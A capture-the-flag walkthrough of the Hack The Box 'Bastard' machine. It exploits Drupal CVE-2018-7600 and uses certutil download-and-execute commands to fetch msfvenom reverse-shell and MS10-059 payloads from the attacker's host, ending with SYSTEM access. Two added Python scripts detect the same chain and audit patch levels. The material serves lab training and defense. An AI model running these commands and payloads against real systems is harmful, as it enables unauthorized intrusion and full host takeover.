hackthebox bastard walkthrough

Starting with nmap.

# nmap 10.10.10.9
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-24 10:09 EDT
Nmap scan report for 10.10.10.9
Host is up (0.31s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
49154/tcp open  unknown

Scan all ports with masscan.

# masscan -e tun0 10.10.10.9 -p1-65535 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-06-24 14:15:02 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 49154/tcp on 10.10.10.9                                   
Discovered open port 135/tcp on 10.10.10.9                                     
Discovered open port 80/tcp on 10.10.10.9 

Doing another scan on the open ports with version detection and the default scripts.

# nmap -sC -sV 10.10.10.9 -oA bastard
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-24 10:29 EDT
Nmap scan report for 10.10.10.9
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.43 seconds

Port 80 reveals a Drupal website.

[Screenshot: hackthebox – bastard – Drupal]

Looking at CHANGELOG.txt, the site runs Drupal version 7.54. A simple Google search turned up an exploit for it (CVE-2018-7600), which I found here.

# python drupa7-CVE-2018-7600.py 
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

usage: drupa7-CVE-2018-7600.py [-h] [-c COMMAND] [-f FUNCTION] [-p PROXY]
                               target
drupa7-CVE-2018-7600.py: error: too few arguments

Oops!! Let me try that again.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c whoami
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-ByG_2Z3QmGyS9xXQBNuXaHdBCuE34SwDHYuELJWYVIo
[*] Triggering exploit to execute: whoami
nt authority\iusr

Sweet! I am iusr. What can I do?? Let’s grab system information.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "systeminfo"
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-iTAK9zFmvizkN2CtoELMj7xx5rxLP6u07-GBY-5iPrE
[*] Triggering exploit to execute: systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          24/6/2019, 3:22:51 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2593 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2593 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.048 MB
Available Physical Memory: 1.568 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.604 MB
Virtual Memory: In Use:    491 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

We got OS information. Hmm, useful; save it as a systeminfo.txt file. Anyway, let’s work on grabbing a shell. Create an exe file using msfvenom.

# msfvenom  lhost=10.10.14.21 lport=4444 -f exe --platform windows -p windows/shell_reverse_tcp > dev.exe
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Set up a Python web server…

# python -m SimpleHTTPServer 80

…and listen on port 4444 for the shell.

# nc -lvnp 4444

Run the following command.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -split -f http://10.10.14.21/dev.exe %temp%/dev.exe && %temp%/dev.exe"

In the above command, 10.10.14.21 is my IP address.

Hopefully you will get a shell too.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.9] 63162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
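The download-and-execute chain above (certutil -urlcache fetching dev.exe, launched from a web-application RCE that runs as iusr) is exactly the kind of process activity endpoint telemetry should catch. As an added example that is not part of the original post, the Python below scans constructed Sysmon-style process-creation records (Event ID 1 fields Image, CommandLine, ParentImage, User) for two things: certutil being used as a downloader, and a shell or download tool spawned by the IIS worker chain. The records, file paths and the assumption that PHP on IIS runs as php-cgi.exe under w3wp.exe are constructed for the example; only the field names follow Sysmon's layout.

```python
"""Flag the process chain a web-app RCE leaves behind on a Windows/IIS host.

Added example, not from the original post. Input is a list of constructed
Sysmon Event ID 1 style records (Image, CommandLine, ParentImage, User).
"""
import re
from collections import Counter
from dataclasses import dataclass

# Assumption: on IIS, PHP runs as php-cgi.exe under the w3wp.exe worker, so
# either of them spawning a shell or a download tool is worth an alert.
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}

# certutil used as a downloader: -urlcache ... -f <url>
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*?\s-f\s+(?P<url>\S+)", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: str
    user: str


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_record(rec):
    """Return the findings for one process-creation record."""
    findings = []
    image = basename(rec["Image"])
    parent = basename(rec["ParentImage"])
    cmdline = rec["CommandLine"]
    user = rec.get("User", "?")

    # Rule 1: certutil downloading something, run directly or via cmd /c.
    if "certutil" in cmdline.lower():
        m = CERTUTIL_DOWNLOAD.search(cmdline)
        if m:
            findings.append(Finding("certutil-download", m.group("url"), user))

    # Rule 2: the web server's worker chain spawning a shell or download tool.
    if parent in WEB_WORKERS and image in SUSPICIOUS_CHILDREN:
        findings.append(Finding("web-worker-spawn", f"{parent} -> {image}", user))
    return findings


def scan(records):
    """Run every record through check_record and collect the findings."""
    findings = []
    for rec in records:
        findings.extend(check_record(rec))
    return findings


def summarize(records):
    """Count findings per rule name."""
    return dict(Counter(f.rule for f in scan(records)))


# Constructed sample telemetry; the first two records mirror the chain above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "certutil -urlcache -split -f http://10.10.14.21/dev.exe C:\Windows\Temp\dev.exe && C:\Windows\Temp\dev.exe"',
     "ParentImage": r"C:\php\php-cgi.exe", "User": r"NT AUTHORITY\IUSR"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://10.10.14.21/dev.exe C:\Windows\Temp\dev.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\IUSR"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\admin\setup.exe SHA256",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"BASTARD\admin"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"BASTARD\admin"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail} (user {f.user})")
```

Running it reports three findings for the four sample records: the cmd.exe launched by php-cgi.exe trips both rules, the certutil.exe child trips the downloader rule, and the hashfile and notepad records are clean. The second rule is the more durable one: the downloader tool can change, but a web worker spawning cmd.exe as IUSR has no benign explanation on a Drupal host.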

Use windows-exploit-suggester against the systeminfo.txt that we saved before.

# python windows-exploit-suggester.py --database 2019-06-24-mssb.xls --systeminfo ~/htb/bastard/systeminfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
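windows-exploit-suggester works from the same systeminfo.txt: it parses the OS version and the installed hotfix list and compares them with the bulletin database. The parsing half is useful on its own as a patch-level check for a host inventory. As an added example that is not part of the original post or of windows-exploit-suggester, the Python below parses systeminfo output (single Key: value lines plus the indented [nn]: continuation lines used by Processor(s), Hotfix(s) and Network Card(s)) and reports a host with no hotfixes or a pre-Service-Pack build. SAMPLE is a shortened copy of the output shown above; SAMPLE_PATCHED, its host name and its KB numbers are constructed for contrast.

```python
"""Parse `systeminfo` output and summarise the host's patch state.

Added example, not from the original post or from windows-exploit-suggester.
"""
import re
from collections import namedtuple

# value: text after the colon on the key line; items: the indented [nn]: lines
Entry = namedtuple("Entry", "value items")

KEY_LINE = re.compile(r"^(?P<key>[^:]+?):\s*(?P<value>.*)$")
CONT_LINE = re.compile(r"^\s+\[\d+\]:\s*(?P<item>.*)$")
KB = re.compile(r"KB\d+", re.IGNORECASE)

# Constructed, shortened copy of the systeminfo output shown above.
SAMPLE = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2593 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2593 Mhz
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed contrast case: SP1 build with hotfixes (KB numbers are placeholders).
SAMPLE_PATCHED = """\
Host Name:                 EXAMPLE-SRV
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
                           [03]: KB3333333
"""


def parse_systeminfo(text):
    """Map each top-level key to an Entry(value, items)."""
    info = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        cont = CONT_LINE.match(raw)
        if cont and current:
            info[current].items.append(cont.group("item").strip())
            continue
        if raw[0].isspace():
            # Indented sub-fields such as "Connection Name:" belong to the
            # current key; they are not needed for the audit and are skipped.
            continue
        key = KEY_LINE.match(raw)
        if key:
            current = key.group("key").strip()
            info[current] = Entry(key.group("value").strip(), [])
    return info


def hotfixes(info):
    """Return the KB identifiers listed under Hotfix(s); "N/A" yields []."""
    entry = info.get("Hotfix(s)")
    if entry is None:
        return []
    kbs = []
    for item in entry.items:
        kbs.extend(k.upper() for k in KB.findall(item))
    return kbs


def os_build(info):
    """Return the numeric OS version, e.g. '6.1.7600'."""
    m = re.match(r"\d+\.\d+\.\d+", info["OS Version"].value)
    return m.group(0) if m else None


def patch_audit(text):
    """Parse one systeminfo dump and return host, build, hotfixes and findings."""
    info = parse_systeminfo(text)
    kbs = hotfixes(info)
    build = os_build(info)
    findings = []
    if not kbs:
        findings.append("no hotfixes installed")
    # 6.1.7600 is the RTM build of Windows 7 / Server 2008 R2; SP1 is 6.1.7601.
    if build == "6.1.7600":
        findings.append("RTM build 7600: Service Pack 1 (build 7601) not applied")
    return {"host": info["Host Name"].value, "build": build,
            "hotfixes": kbs, "findings": findings}


if __name__ == "__main__":
    for sample in (SAMPLE, SAMPLE_PATCHED):
        print(patch_audit(sample))
```

For the BASTARD dump the audit returns no hotfixes and the RTM build, which is why the suggester above lists every 2008 R2 bulletin as unpatched; the constructed SP1 host returns three KBs and no findings. Note that KEY_LINE splits on the first colon, so a key such as "Virtual Memory: Max Size" parses as key "Virtual Memory" with the remainder in the value, which is harmless for this audit.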

For some reason, I was not able to execute the exe if I fetched it from the shell, so I used the Python script to download the executable and run it. For this box, I used MS10-059 as before. I got it from here. Remember, it is good practice to compile your own binary. This may not be the intended way, but I did it this way. Feel free to mention alternative ways (other than the ippsec walkthrough).

Listen for shell on port 443.

# nc -lvnp 443

Run the script.

# python drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -split -f http://10.10.14.21/MS10-059.exe %temp%/MS10-059.exe && %temp%/MS10-059.exe 10.10.14.21 443"
()
=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-IXXTzoX8LF3w8nEXc8ZyuEAGhRnXjUcwOT8R9RjdyLI
[*] Triggering exploit to execute: certutil -urlcache -split -f http://10.10.14.21/MS10-059.exe %temp%/MS10-059.exe && %temp%/MS10-059.exe 10.10.14.21 443
# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.9] 63181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

Now, you can read the flags.
